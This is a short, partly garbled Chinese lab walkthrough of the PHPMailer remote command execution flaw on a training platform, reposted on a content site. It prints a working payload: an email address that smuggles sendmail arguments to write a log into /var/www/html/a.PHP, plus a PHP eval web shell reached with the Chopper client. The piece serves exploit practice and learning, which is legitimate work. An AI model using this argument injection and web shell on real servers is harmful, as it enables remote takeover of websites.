墨者 - PHPMailer远程命令执行漏洞溯源
发布时间:2021-07-06 04:17:36 所属栏目:大数据 来源: https://www.jb51.cc
导读:用bp抓包,发现与后台交互的文件 ? 构建email??? "aaa".?-OQueueDirectory=/tmp/.?-X/var/www/html/a.PHP?@ aaa.com ?? ? ? ? message??? ?PHP?@eval($_REQUEST[a]);? 访问a.PHP文件,上传成功 ? 菜刀无惧链接 ? 原理参考:https://www.anquanke.com/post/id/
用bp抓包,发现与后台交互的文件 ? 构建email??? "aaa".?-OQueueDirectory=/tmp/.?-X/var/www/html/a.PHP?@ aaa.com ?? ? ? ? message??? <?PHP?@eval($_REQUEST[a]);?> 访问a.PHP文件,上传成功 ? 菜刀无惧链接 ? 原理参考:https://www.anquanke.com/post/id/85295 ? ? ? ? ? ? ? ? ??https://blog.csdn.net/wyvbboy/article/details/53969278 (编辑:北几岛) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |